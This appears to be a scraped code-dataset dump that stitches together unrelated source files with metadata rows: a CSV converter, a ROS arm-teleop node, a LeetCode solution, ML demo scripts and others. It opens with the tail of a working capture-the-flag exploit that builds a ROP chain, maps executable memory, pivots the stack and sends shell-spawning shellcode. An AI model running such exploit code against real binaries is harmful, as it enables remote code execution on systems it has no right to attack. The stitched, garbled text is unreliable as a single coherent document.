addr, instr = line.split(': ')
if bad_str in addr:
continue
if instr == target:
return ast.literal_eval(addr)
log.error('FAILED looking for: ' + target)
def get_gadgets():
raw_gadgets = subprocess.check_output('ropper --nocolor --file ./challenge', shell=True)
gadgets = {}
gadgets['POP_RDI'] = get_gadget(raw_gadgets, 'pop rdi; ret;')
gadgets['POP_RSI'] = get_gadget(raw_gadgets, 'pop rsi; ret;')
gadgets['POP_RDX'] = get_gadget(raw_gadgets, 'pop rdx; ret;')
gadgets['POP_R8_R9_RCX'] = get_gadget(raw_gadgets, 'pop r8; pop r9; pop rcx; ret;')
gadgets['POP_RAX_R9_RCX'] = get_gadget(raw_gadgets, 'pop rax; pop r9; pop rcx; ret;')
gadgets['POP_RSP'] = get_gadget(raw_gadgets, 'pop rsp; pop r13; pop r14; pop r15; ret;')
jmp_gadgets = subprocess.check_output('ropper --nocolor --file ./challenge --jmp rax', shell=True)
gadgets['JMP_RAX'] = get_gadget(jmp_gadgets, 'jmp rax;')
return gadgets
def win(io):
if args['REMOTE']:
write_binary(io)
gadgets = get_gadgets()
# Account for pop's from pivoted stack pointer.
rop = 'A' * 0x18
mmap_addr = 0x7fe7a1e8f000
# mmap
rop += p64(gadgets['POP_RDI'])
rop += p64(mmap_addr)
rop += p64(gadgets['POP_RSI'])
rop += p64(EGG_SIZE)
rop += p64(gadgets['POP_RDX'])
rop += p64(PROT_RWX)
rop += p64(gadgets['POP_R8_R9_RCX'])
rop += p64(0xffffffffffffffff) # 5th arg
rop += p64(0) # 6th arg
rop += p64(constants.MAP_PRIVATE | constants.MAP_FIXED | constants.MAP_ANON) # 4th arg
rop += p64(Addrs.MMAP)
# read
rop += p64(gadgets['POP_RDI'])
rop += p64(0)
rop += p64(gadgets['POP_RSI'])
rop += p64(mmap_addr)
rop += p64(gadgets['POP_RDX'])
rop += p64(EGG_SIZE)
rop += p64(Addrs.READ)
# redirect execution
rop += p64(gadgets['POP_RAX_R9_RCX'])
rop += p64(mmap_addr)
rop += p64(0)
rop += p64(0)
rop += p64(gadgets['JMP_RAX'])
fill_choice_buffer(io, rop)
# stack pivot
check_out(io, Addrs.CHOICE_BUF, -8)
check_out(io, 0, -7)
check_out(io, gadgets['POP_RSP'], -10)
# final payload
sc = asm(shellcraft.sh())
assert len(sc) <= EGG_SIZE
sc = sc + 'A' * (EGG_SIZE - len(sc))
io.send(sc)
io.interactive()
if __name__ == '__main__':
init_pwntools_context()
io = init_io()
if args['PAUSE']:
raw_input('PAUSED...')
win(io)
| 23.682353
| 102
| 0.619722
| 574
| 4,026
| 4.167247
| 0.318815
| 0.057692
| 0.048913
| 0.053512
| 0.240803
| 0.182692
| 0.157191
| 0.070234
| 0
| 0
| 0
| 0.039769
| 0.225534
| 4,026
| 169
| 103
| 23.822485
| 0.727389
| 0.059364
| 0
| 0.179245
| 0
| 0
| 0.148011
| 0
| 0
| 0
| 0.017507
| 0
| 0.018868
| 1
| 0.084906
| false
| 0
| 0.037736
| 0
| 0.198113
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee42ab06df137bb5158c466e211b9c061a500ecf
| 1,485
|
py
|
Python
|
utils/mongo_seed/csv_to_json.py
|
Abdoul1996/superteam2
|
3ba558f9dfd652007a1f80ee01543c266c87bc0d
|
[
"MIT"
] | null | null | null |
utils/mongo_seed/csv_to_json.py
|
Abdoul1996/superteam2
|
3ba558f9dfd652007a1f80ee01543c266c87bc0d
|
[
"MIT"
] | null | null | null |
utils/mongo_seed/csv_to_json.py
|
Abdoul1996/superteam2
|
3ba558f9dfd652007a1f80ee01543c266c87bc0d
|
[
"MIT"
] | null | null | null |
from os import path
import csv
import json
import random
# Our dataset was created from http://www2.informatik.uni-freiburg.de/~cziegler/BX/ and reduced down to 1,000 records
# The CSV file has semicolon delimiters due to book titles containing commas
SCRIPT_DIR = path.dirname(path.realpath(__file__)) + '/'
DB_FILE = SCRIPT_DIR + 'cscl_db.csv'
OUTPUT_FILE = SCRIPT_DIR + 'cscl_db.json'
# Original headers: "ISBN";"Book-Title";"Book-Author";"Year-Of-Publication";"Publisher";"Image-URL-S";"Image-URL-M";"Image-URL-L"
with open(DB_FILE, 'r') as file:
reader = csv.DictReader(file,
delimiter=';',
fieldnames=[
'isbn', 'title', 'author', 'publication_year',
'publisher', 'image_url_s', 'image_url_m',
'image_url_l'
])
with open(OUTPUT_FILE, 'w') as o_file:
for line in reader:
copies = random.randrange(1,10)
available = random.randrange(0,copies)
line['copies'] = copies
line['available'] = available
# Convert publication_year from string to int
line['publication_year'] = int(line['publication_year'])
json.dump(line, o_file)
o_file.write('\n')
print(
'\n----------\nFinished converting {} from CSV to JSON.\nFile can be found at {}'
.format(DB_FILE, OUTPUT_FILE))
| 38.076923
| 129
| 0.576431
| 180
| 1,485
| 4.6
| 0.5
| 0.057971
| 0.031401
| 0.041063
| 0.152174
| 0.10628
| 0.10628
| 0.10628
| 0.10628
| 0.10628
| 0
| 0.008629
| 0.297643
| 1,485
| 38
| 130
| 39.078947
| 0.785235
| 0.243771
| 0
| 0
| 0
| 0
| 0.203936
| 0.019678
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.148148
| 0
| 0.148148
| 0.037037
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee46f59058bfd66eb8f015628cb6a304ce257ecc
| 3,471
|
py
|
Python
|
scripts/kinova_joy_teleop.py
|
Gregory-Baker/kinova_joy_teleop
|
42666022662fdcf7985ca5d4598eecb5e18eb8b6
|
[
"MIT"
] | null | null | null |
scripts/kinova_joy_teleop.py
|
Gregory-Baker/kinova_joy_teleop
|
42666022662fdcf7985ca5d4598eecb5e18eb8b6
|
[
"MIT"
] | null | null | null |
scripts/kinova_joy_teleop.py
|
Gregory-Baker/kinova_joy_teleop
|
42666022662fdcf7985ca5d4598eecb5e18eb8b6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
Node to convert joystick commands to kinova arm cartesian movements
"""
import rospy
from sensor_msgs.msg import Joy
#from geometry_msgs.msg import Pose
from kortex_driver.msg import TwistCommand, Finger, Empty, Pose
from kortex_driver.srv import SendGripperCommand, SendGripperCommandRequest, GetMeasuredCartesianPose, GetMeasuredCartesianPoseResponse
max_linear_speed = 0.1
max_angular_speed = 0.4
gripper_speed = 0.05
cartesian_min_limit_x = 0.3
restricted_mode = False
joy_topic = "joy"
arm_ns = ""
def joy_listener():
# start node
rospy.init_node("kinova_joy_teleop")
global restricted_mode
restricted_mode = rospy.get_param("~restricted_mode", False)
global arm_ns
arm_ns = rospy.get_param("~arm_ns", "")
global joy_topic
joy_topic = rospy.get_param("~joy_topic", "joy")
rospy.loginfo("restricted mode: " + str(restricted_mode))
# subscribe to joystick messages on topic "joy"
rospy.Subscriber(joy_topic, Joy, joy_cmd_callback, queue_size=1)
# keep node alive until stopped
rospy.spin()
def joy_cmd_callback(data):
# start publisher
pub = rospy.Publisher(arm_ns + "/in/cartesian_velocity", TwistCommand, queue_size=1)
# create gripper command message
cmd = TwistCommand()
if ((data.axes[5] < 0 or data.buttons[5] == 1) and data.buttons[4] != 1):
pose_srv = rospy.ServiceProxy(arm_ns + "/base/get_measured_cartesian_pose", GetMeasuredCartesianPose)
cmd.twist.linear_x = data.axes[1] * max_linear_speed
if (restricted_mode and data.axes[1] < 0):
try:
pose = GetMeasuredCartesianPoseResponse()
pose = pose_srv(Empty())
#rospy.loginfo("Kinova x position: %f")
except rospy.ServiceException as e:
rospy.loginfo("cartesian pose request failed")
if (pose.output.x < cartesian_min_limit_x):
cmd.twist.linear_x = 0
cmd.twist.linear_y = data.axes[0] * max_linear_speed
cmd.twist.linear_z = data.axes[4] * max_linear_speed
cmd.twist.angular_z = -data.axes[3] * max_angular_speed
rospy.loginfo("linear velocities: {%f, %f, %f};", cmd.twist.linear_x, cmd.twist.linear_y, cmd.twist.linear_z)
elif (not restricted_mode and data.axes[2] < 0):
cmd.twist.angular_x = data.axes[1] * max_angular_speed
cmd.twist.angular_y = -data.axes[0] * max_angular_speed
cmd.twist.angular_z = -data.axes[3] * max_angular_speed
rospy.loginfo("angular velocities: {%f, %f, %f};", cmd.twist.angular_x, cmd.twist.angular_y, cmd.twist.angular_z)
if (data.buttons[0] == 1 or data.buttons[1] == 1):
cmd_gripper_req = SendGripperCommandRequest()
cmd_gripper_req.input.mode = 2
fingey = Finger()
gripper_dir = -1 if data.buttons[0] == 1 else 1
fingey.value = gripper_dir*gripper_speed
cmd_gripper_req.input.gripper.finger.append(fingey)
try:
cmd_gripper_srv = rospy.ServiceProxy(arm_ns + "/base/send_gripper_command", SendGripperCommand)
cmd_gripper_srv(cmd_gripper_req)
except rospy.ServiceException as e:
rospy.loginfo(cmd_gripper_req)
rospy.loginfo("joystick gripper command failed")
# publish gripper command
pub.publish(cmd)
if __name__ == '__main__':
try:
joy_listener()
except rospy.ROSInterruptException:
pass
| 35.418367
| 135
| 0.675886
| 460
| 3,471
| 4.863043
| 0.26087
| 0.050067
| 0.043809
| 0.020116
| 0.219937
| 0.151095
| 0.088511
| 0.050961
| 0.050961
| 0.050961
| 0
| 0.014012
| 0.218669
| 3,471
| 97
| 136
| 35.783505
| 0.810841
| 0.091616
| 0
| 0.109375
| 0
| 0
| 0.091489
| 0.025821
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0.015625
| 0.0625
| 0
| 0.09375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee476c7b28e95c420c92669fa0909df9dee5dae3
| 576
|
py
|
Python
|
ausgesondert/dammitJim.py
|
Coding-for-the-Arts/drawbot-samples-solutions
|
7191610d6efd7d788056070e7826d255b7ef496b
|
[
"CC0-1.0"
] | null | null | null |
ausgesondert/dammitJim.py
|
Coding-for-the-Arts/drawbot-samples-solutions
|
7191610d6efd7d788056070e7826d255b7ef496b
|
[
"CC0-1.0"
] | null | null | null |
ausgesondert/dammitJim.py
|
Coding-for-the-Arts/drawbot-samples-solutions
|
7191610d6efd7d788056070e7826d255b7ef496b
|
[
"CC0-1.0"
] | null | null | null |
kraftausdruecke = [
"Mist",
"Verdammt",
"Mannmannmann",
"Herrgottnochmal",
"Echt jetzt",
"Zum Teufel"
]
berufe = [
"Baggerführer",
"Velokurier",
"Tierärztin",
"Verkehrspolizist",
"Schreinerin",
"Apotheker",
"Komponist",
"Physikerin",
"Buchhändlerin"
]
a = choice(kraftausdruecke)
# pick random element in list
# find out its index
# pop it from the list, so it can’t be picked again
b = berufe.pop(berufe.index(choice(berufe)))
c = choice(berufe)
print(a, "Erwin" + ",", "ich bin", b, "und nicht", c + "!")
| 20.571429
| 59
| 0.604167
| 62
| 576
| 5.612903
| 0.774194
| 0.068966
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.239583
| 576
| 27
| 60
| 21.333333
| 0.794521
| 0.166667
| 0
| 0
| 0
| 0
| 0.383158
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee4a673bdc3ecbf54bdd00a403e289703d72c886
| 2,429
|
py
|
Python
|
python/652_find_duplicated_subtrees.py
|
liaison/LeetCode
|
8b10a1f6bbeb3ebfda99248994f7c325140ee2fd
|
[
"MIT"
] | 17
|
2016-03-01T22:40:53.000Z
|
2021-04-19T02:15:03.000Z
|
python/652_find_duplicated_subtrees.py
|
liaison/LeetCode
|
8b10a1f6bbeb3ebfda99248994f7c325140ee2fd
|
[
"MIT"
] | null | null | null |
python/652_find_duplicated_subtrees.py
|
liaison/LeetCode
|
8b10a1f6bbeb3ebfda99248994f7c325140ee2fd
|
[
"MIT"
] | 3
|
2019-03-07T03:48:43.000Z
|
2020-04-05T01:11:36.000Z
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def findDuplicateSubtrees(self, root: TreeNode) -> List[TreeNode]:
# set of all node strings
node_str_set = set()
duplicated_strs = set()
duplicated_nodes = list()
def node2str(node):
"""
this function accomplishes two tasks:
- index each node into a string
- search the duplicated nodes during the traversal
"""
nonlocal node_str_set
nonlocal duplicated_strs
nonlocal duplicated_nodes
if node is None:
return ""
left_str = node2str(node.left)
right_str = node2str(node.right)
node_str = str(node.val) + "(" + left_str + ")" + "(" + right_str + ")"
if node_str in node_str_set:
if node_str not in duplicated_strs:
duplicated_strs.add(node_str)
duplicated_nodes.append(node)
else:
node_str_set.add(node_str)
return node_str
node2str(root)
return duplicated_nodes
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class SolutionCount:
def findDuplicateSubtrees(self, root: TreeNode) -> List[TreeNode]:
# node_str -> count
node_str_count = defaultdict(int)
duplicated_nodes = list()
def node2str(node):
"""
this function accomplishes two tasks:
- index each node into a string
- search the duplicated nodes during the traversal
"""
nonlocal node_str_count
nonlocal duplicated_nodes
if node is None:
return ""
node_str = "{}({})({})".format(
node.val, node2str(node.left), node2str(node.right))
node_str_count[node_str] += 1
if node_str_count[node_str] == 2:
duplicated_nodes.append(node)
return node_str
node2str(root)
return duplicated_nodes
| 26.402174
| 83
| 0.539728
| 258
| 2,429
| 4.883721
| 0.224806
| 0.105556
| 0.047619
| 0.038095
| 0.712698
| 0.634921
| 0.634921
| 0.552381
| 0.414286
| 0.414286
| 0
| 0.007952
| 0.378757
| 2,429
| 91
| 84
| 26.692308
| 0.827038
| 0.271717
| 0
| 0.5
| 0
| 0
| 0.008663
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee4ac13afb88b80f6571f8b3cdd5af07771ebb6c
| 3,391
|
py
|
Python
|
main.py
|
rajanant49/Streamlit-Demo-App
|
894e0e2dbdf33148bccc6abc791221f6e7b01036
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
rajanant49/Streamlit-Demo-App
|
894e0e2dbdf33148bccc6abc791221f6e7b01036
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
rajanant49/Streamlit-Demo-App
|
894e0e2dbdf33148bccc6abc791221f6e7b01036
|
[
"Apache-2.0"
] | null | null | null |
import streamlit as st
from PIL import Image
import cv2
import numpy as np
from sklearn import datasets
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
st.title("Streamlit Demo App")
st.write("""
# Explorling different classifier on different datasets
""")
dataset_name= st.selectbox("Select Dataset",("","IRIS","BreastCancer","WineDataset"))
if dataset_name!="":
classifier_name=st.selectbox("Select Classifier",("","KNN","RandomForest","SVM"))
if classifier_name!="":
def get_dataset(dataset_name):
if dataset_name=="IRIS":
data=datasets.load_iris()
elif dataset_name=="BreastCancer":
data=datasets.load_breast_cancer()
else:
data=datasets.load_wine()
X=data.data
y=data.target
return X,y
X,y=get_dataset(dataset_name)
st.write("Shape of the dataset",X.shape)
st.write("Number of classes",len(np.unique(y)))
def add_parameter_ui(clf_name):
params=dict()
if clf_name=="KNN":
K=st.slider("K",1,15)
params["K"]=K
elif clf_name=="SVM":
C=st.slider("C",0.01,10.0)
params['C']=C
else:
max_depth=st.slider("max_depth",2,15)
n_estimators=st.slider("n_estimators",1,100)
params["max_depth"]=max_depth
params["n_estimators"]=n_estimators
return params
params=add_parameter_ui(classifier_name)
def get_classifier(clf_name,params):
if clf_name=="KNN":
clf=KNeighborsClassifier(n_neighbors=params["K"])
elif clf_name=="SVM":
clf=SVC(C=params["C"])
else:
clf=RandomForestClassifier(n_estimators=params["n_estimators"],max_depth=params["max_depth"],random_state=42)
return clf
clf=get_classifier(classifier_name,params)
#Classification
X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2,random_state=42)
clf.fit(X_train,y_train)
y_pred=clf.predict(X_test)
acc=accuracy_score(y_pred,y_test)
st.write("Classifier = ",classifier_name)
st.write("Accuracy = ",np.round(acc*100,2),"%")
pca=PCA(2)
X_projected=pca.fit_transform(X)
x1=X_projected[:,0]
x2=X_projected[:,1]
fig=plt.figure()
plt.scatter(x1,x2,c=y,alpha=0.8,cmap='viridis')
plt.xlabel("Principal Component 1")
plt.ylabel("Principal Component 2")
plt.colorbar()
st.pyplot(fig)
# def load_image(image_file):
# img = Image.open(image_file)
# return img
#
# image_file = st.file_uploader("Upload Image",type=['png','jpeg','jpg'])
# if image_file is not None:
# file_details = {"Filename":image_file.name,"FileType":image_file.type,"FileSize":image_file.size}
# st.write(file_details)
#
# img = load_image(image_file)
# st.image(img,width=250,height=250)
# image_array=np.asarray(img)
# st.image(image_array,width=100,height=100)
| 30.54955
| 125
| 0.6243
| 444
| 3,391
| 4.585586
| 0.306306
| 0.035363
| 0.023576
| 0.020629
| 0.014735
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019646
| 0.249484
| 3,391
| 110
| 126
| 30.827273
| 0.780354
| 0.136538
| 0
| 0.09589
| 0
| 0
| 0.123198
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041096
| false
| 0
| 0.164384
| 0
| 0.246575
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee4ba609d0784a1c68fa7c4cd767173c1520196d
| 3,485
|
py
|
Python
|
Face-Pixelizer/res/python/src/pixelize.py
|
spil3141/Pixelizer-Face
|
c234fe998727435d88f4b860432945c2e6a957ef
|
[
"MIT"
] | null | null | null |
Face-Pixelizer/res/python/src/pixelize.py
|
spil3141/Pixelizer-Face
|
c234fe998727435d88f4b860432945c2e6a957ef
|
[
"MIT"
] | null | null | null |
Face-Pixelizer/res/python/src/pixelize.py
|
spil3141/Pixelizer-Face
|
c234fe998727435d88f4b860432945c2e6a957ef
|
[
"MIT"
] | null | null | null |
"""
python3 detect.py \
--model ${TEST_DATA}/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite
"""
import argparse
import os
import numpy as np
import tensorflow as tf
import numpy as np
import PIL
import matplotlib.pyplot as plt
import matplotlib.image as matimage
class ConvolutionalAutoencoder(tf.keras.models.Model):
def __init__(self):
super(ConvolutionalAutoencoder,self).__init__()
self.encoder_input_shape = (128,128,3)
self.encoder = tf.keras.models.Sequential([
tf.keras.layers.Input(shape= self.encoder_input_shape),
tf.keras.layers.Conv2D(16, (3,3), activation='relu', padding='same'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(8, (3,3), activation='relu', padding='same'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(3, (3,3), activation='relu', padding='same'),
])
self.decoder = tf.keras.Sequential([
# Upsample its input
tf.keras.layers.UpSampling2D((2, 2)),
# tf.keras.layers.Conv2D(3, kernel_size=(3,3),strides=2, activation='relu', padding='same'),
tf.keras.layers.Conv2D(3, kernel_size=(3,3),strides=2, activation='sigmoid', padding='same')])
def call(self, x):
encoded = self.encoder(x)
decoded = self.decoder(encoded)
return decoded
def remove_alpha(img : np) -> np:
return np.array([img[0,:,:,:3]])
def display_sample(img : np):
plt.imshow(img[0])
plt.show()
def Get_Img(path : str) -> np:
img_2 = np.asarray(PIL.Image.open(path).resize((128,128)))
img_2 = np.array([img_2])
img_2 = img_2/255
print("shape: ", img_2.shape)
if img_2.shape[-1] >3:
img_2 = remove_alpha(img_2)
return img_2
def Save(imgarray : np, path : str) -> None:
# method 1
matimage.imsave(os.path.join(path,"output.png"),imgarray)
#method 2 (not working)
# imgarray = imgarray * 255
# imgarray = imgarray.astype(int)
# imgarray = PIL.Image.fromarray(imgarray)
# imgarray.save(os.path.join(path,"output.png"))
def main():
default_encoder_model = 'res/python/res/SavedModels/pretrained_model_encoder.h5'
default_decoder_model = 'res/python/res/SavedModels/pretrained_model_decoder.h5'
image_output_dir = "res/python/res/data/output"
parser = argparse.ArgumentParser()
parser.add_argument('--use_model', type=bool, default=True, help='Use default model?')
parser.add_argument("--img", help=" The relative path of the targeted image to this file.",
default= "None")
parser.add_argument("--display", help=" Display result", default = False)
parser.add_argument("--output_dir", help="The output directory.", default = None)
args = parser.parse_args()
if(args.use_model and args.img != "None"):
print("Using pretrained model.")
else:
print("No Pretrained Model Selected")
return
pixelazer = ConvolutionalAutoencoder()
# Loading Pretrained Model
pixelazer.encoder = tf.keras.models.load_model(default_encoder_model)
pixelazer.decoder = tf.keras.models.load_model(default_decoder_model)
pixelazer.compile(optimizer= "adam", loss=tf.keras.losses.MeanSquaredError())
output = pixelazer.predict(Get_Img(args.img))
if(args.display):
display_sample(output)
if(args.output_dir != None):
Save(output[0],args.output_dir)
print("Done")
exit()
if __name__ == '__main__':
main()
| 34.50495
| 100
| 0.667432
| 466
| 3,485
| 4.839056
| 0.309013
| 0.046563
| 0.051885
| 0.042129
| 0.231929
| 0.213304
| 0.155211
| 0.109091
| 0.109091
| 0.109091
| 0
| 0.025822
| 0.188809
| 3,485
| 101
| 101
| 34.504951
| 0.771843
| 0.119369
| 0
| 0.056338
| 0
| 0
| 0.133028
| 0.043906
| 0
| 0
| 0
| 0
| 0
| 1
| 0.098592
| false
| 0
| 0.112676
| 0.014085
| 0.28169
| 0.056338
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee4d585ac0fdab34831b9549bd00bfc84fbe7647
| 4,905
|
py
|
Python
|
model_zoo/official/cv/centerface/postprocess.py
|
Vincent34/mindspore
|
a39a60878a46e7e9cb02db788c0bca478f2fa6e5
|
[
"Apache-2.0"
] | 1
|
2021-07-03T06:52:20.000Z
|
2021-07-03T06:52:20.000Z
|
model_zoo/official/cv/centerface/postprocess.py
|
Vincent34/mindspore
|
a39a60878a46e7e9cb02db788c0bca478f2fa6e5
|
[
"Apache-2.0"
] | null | null | null |
model_zoo/official/cv/centerface/postprocess.py
|
Vincent34/mindspore
|
a39a60878a46e7e9cb02db788c0bca478f2fa6e5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""post process for 310 inference"""
import os
import numpy as np
from src.model_utils.config import config
from dependency.centernet.src.lib.detectors.base_detector import CenterFaceDetector
from dependency.evaluate.eval import evaluation
dct_map = {'16': '16--Award_Ceremony', '26': '26--Soldier_Drilling', '29': '29--Students_Schoolkids',
'30': '30--Surgeons', '52': '52--Photographers', '59': '59--people--driving--car', '44': '44--Aerobics',
'50': '50--Celebration_Or_Party', '19': '19--Couple', '38': '38--Tennis', '37': '37--Soccer',
'48': '48--Parachutist_Paratrooper', '53': '53--Raid', '6': '6--Funeral', '40': '40--Gymnastics',
'5': '5--Car_Accident', '39': '39--Ice_Skating', '47': '47--Matador_Bullfighter', '61': '61--Street_Battle',
'56': '56--Voter', '18': '18--Concerts', '1': '1--Handshaking', '2': '2--Demonstration',
'28': '28--Sports_Fan', '4': '4--Dancing', '43': '43--Row_Boat', '49': '49--Greeting', '12': '12--Group',
'24': '24--Soldier_Firing', '33': '33--Running', '11': '11--Meeting', '36': '36--Football',
'45': '45--Balloonist', '15': '15--Stock_Market', '51': '51--Dresses', '7': '7--Cheering',
'32': '32--Worker_Laborer', '58': '58--Hockey', '35': '35--Basketball', '22': '22--Picnic',
'55': '55--Sports_Coach_Trainer', '3': '3--Riot', '23': '23--Shoppers', '34': '34--Baseball',
'8': '8--Election_Campain', '9': '9--Press_Conference', '17': '17--Ceremony', '13': '13--Interview',
'20': '20--Family_Group', '25': '25--Soldier_Patrol', '42': '42--Car_Racing', '0': '0--Parade',
'14': '14--Traffic', '41': '41--Swimming', '46': '46--Jockey', '10': '10--People_Marching',
'54': '54--Rescue', '57': '57--Angler', '31': '31--Waiter_Waitress', '27': '27--Spa', '21': '21--Festival'}
def cal_acc(result_path, label_file, meta_file, save_path):
detector = CenterFaceDetector(config, None)
if not os.path.exists(save_path):
for im_dir in dct_map.values():
out_path = os.path.join(save_path, im_dir)
if not os.path.exists(out_path):
os.makedirs(out_path)
name_list = np.load(os.path.join(meta_file, "name_list.npy"), allow_pickle=True)
meta_list = np.load(os.path.join(meta_file, "meta_list.npy"), allow_pickle=True)
for num, im_name in enumerate(name_list):
meta = meta_list[num]
output_hm = np.fromfile(os.path.join(result_path, im_name) + "_0.bin", dtype=np.float32).reshape((1, 200))
output_wh = np.fromfile(os.path.join(result_path, im_name) + "_1.bin", dtype=np.float32).reshape(
(1, 2, 208, 208))
output_off = np.fromfile(os.path.join(result_path, im_name) + "_2.bin", dtype=np.float32).reshape(
(1, 2, 208, 208))
output_kps = np.fromfile(os.path.join(result_path, im_name) + "_3.bin", dtype=np.float32).reshape(
(1, 10, 208, 208))
topk_inds = np.fromfile(os.path.join(result_path, im_name) + "_4.bin", dtype=np.int32).reshape((1, 200))
reg = output_off if config.reg_offset else None
detections = []
for scale in config.test_scales:
dets = detector.centerface_decode(output_hm, output_wh, output_kps, reg=reg, opt_k=config.K,
topk_inds=topk_inds)
dets = detector.post_process(dets, meta, scale)
detections.append(dets)
dets = detector.merge_outputs(detections)
index = im_name.split('_')[0]
im_dir = dct_map.get(index)
with open(save_path + '/' + im_dir + '/' + im_name + '.txt', 'w') as f:
f.write('{:s}\n'.format('%s/%s.jpg' % (im_dir, im_name)))
f.write('{:d}\n'.format(len(dets)))
for b in dets[1]:
x1, y1, x2, y2, s = b[0], b[1], b[2], b[3], b[4]
f.write('{:.1f} {:.1f} {:.1f} {:.1f} {:.3f}\n'.format(x1, y1, (x2 - x1 + 1), (y2 - y1 + 1), s))
print(f"no.[{num}], image_nameL {im_name}")
evaluation(save_path, label_file)
if __name__ == '__main__':
cal_acc(config.result_path, config.label_file, config.meta_file, config.save_path)
| 59.096386
| 119
| 0.589602
| 690
| 4,905
| 4.033333
| 0.447826
| 0.021559
| 0.028746
| 0.028746
| 0.158103
| 0.130075
| 0.112109
| 0.112109
| 0.091987
| 0.027309
| 0
| 0.078839
| 0.206116
| 4,905
| 82
| 120
| 59.817073
| 0.63585
| 0.136595
| 0
| 0.033898
| 0
| 0
| 0.268501
| 0.034393
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016949
| false
| 0
| 0.084746
| 0
| 0.101695
| 0.016949
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee4ea53c9f59142caa780fc1889e82f9447f0d50
| 1,231
|
py
|
Python
|
myapp/multiplication.py
|
TomokiEmmei/kadai
|
eaf3c7430aa28ca9cc00bb0dbd219999e5ebb555
|
[
"MIT"
] | null | null | null |
myapp/multiplication.py
|
TomokiEmmei/kadai
|
eaf3c7430aa28ca9cc00bb0dbd219999e5ebb555
|
[
"MIT"
] | null | null | null |
myapp/multiplication.py
|
TomokiEmmei/kadai
|
eaf3c7430aa28ca9cc00bb0dbd219999e5ebb555
|
[
"MIT"
] | null | null | null |
"""
2018.Jan
@author: Tomoki Emmei
description: program to show multiplication and addition table
"""
import sys #read command line argument
# Display the multiplication table
def kakezan(a,b):
Seki_tab=[[0 for i in range(a)] for j in range(b)]# array for the test
